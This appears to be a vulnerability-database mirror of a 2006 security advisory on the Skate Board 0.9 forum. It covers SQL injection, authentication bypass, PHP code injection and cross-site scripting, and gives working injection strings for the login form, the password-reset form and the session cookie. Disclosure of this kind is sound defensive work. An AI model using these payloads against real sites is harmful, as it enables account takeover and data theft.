Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormAliaksandr HartsuyeuPACKETSTORM:44361
HistoryMar 06, 2006 - 12:00 a.m.

EV0084.txt

2006-03-0600:00:00
Aliaksandr Hartsuyeu
packetstormsecurity.com
18

0.009 Low

EPSS

Percentile

80.5%

JSON
`New eVuln Advisory:  
Skate Board Multimple Vulnerabilities  
http://evuln.com/vulns/84/summary.html  
  
--------------------Summary----------------  
eVuln ID: EV0084  
CVE: CVE-2006-0809 CVE-2006-0810 CVE-2006-0811  
Software: Skate Board  
Sowtware's Web Site: http://bb.jiraiya.se/main.php?content=start  
Versions: 0.9  
Critical Level: Dangerous  
Type: Multiple Vulnerabilities  
Class: Remote  
Status: Unpatched. No reply from developer(s)  
Exploit: Available  
Solution: Not Available  
Discovered by: Aliaksandr Hartsuyeu (eVuln.com)  
  
-----------------Description---------------  
1. SQL Injection.  
  
Vulnerable script: includes/root/sendpass.php  
  
Variable $_POST[usern] isn't properly sanitized before being used in a SQL query. This can be used to make any SQL query by injecting arbitrary SQL code.  
  
Condition: magic_quotes_gpc - off  
  
  
2. Authentication Bypass.  
  
Vulnerable scripts:  
includes/root/login.php  
includes/root/logged.php  
  
Variables $_POST[usern] $_POST[passwd] $_COOKIE[sf_cookie] are not properly sanitized before being used in a SQL query. This can be used to make any SQL query by injecting arbitrary SQL code and make authorization bypass.  
  
Condition: magic_quotes_gpc - off  
  
  
3. PHP Code Injection.  
  
Administrator has an ability to edit values of variables in config.php This can be used to inject arbitrary PHP code.  
  
System access is possible.  
  
  
4. Multiple Cross-Site Scripting.  
  
Vulnerable script: includes/root/reguser.php  
  
All user-defined data from registration form isn't properly sanitized. This can be used to inject arbitrary html or script code.  
  
--------------Exploit----------------------  
Available at: http://evuln.com/vulns/84/exploit.html  
  
1. SQL Injection Example  
  
Url: http://[host]/index.php? act=lostpass  
Username: aaa' union select 1,2,3,4,5,6, 7,8,9,10,11, 12,13,14,15, 16,17,18,19, 20/*  
  
  
2. Authentication Bypass.  
  
a) From login form:  
username: [username]' and 1/*  
password: any  
  
b) Cookie value  
Cookie: sf_cookie=admin% 27+and+1%2F% 2A%3Basd  
  
  
3. PHP Code Injection Example.  
  
Min user chars is: 3; [code]  
  
  
4. Multiple Cross-Site Scripting.  
  
url: http://[host]/index.php? act=register  
username: [XSS]  
Full Name: [XSS]  
Location: [XSS]  
ICQ: [XSS]  
Yahoo: [XSS]  
  
  
--------------Solution---------------------  
No Patch available.  
  
--------------Credit-----------------------  
Discovered by: Aliaksandr Hartsuyeu (eVuln.com)  
  
  
Regards,  
Aliaksandr Hartsuyeu  
http://evuln.com - Penetration Testing Services  
.  
  
`

Related

securityvulns 1
cve 3
prion 3
securityvulns
securityvulns
[eVuln] Skate Board Multimple Vulnerabilities
2006-03-03 00:00:00
cve
cve
CVE-2006-0810
2006-02-21 02:02:00
CVE-2006-0811
2006-02-21 02:02:00
CVE-2006-0809
2006-02-21 02:02:00
prion
prion
Code injection
2006-02-21 02:02:00
Cross site scripting
2006-02-21 02:02:00
Sql injection
2006-02-21 02:02:00

0.009 Low

EPSS

Percentile

80.5%

JSON
Related for PACKETSTORM:44361
securityvulns1cve3prion3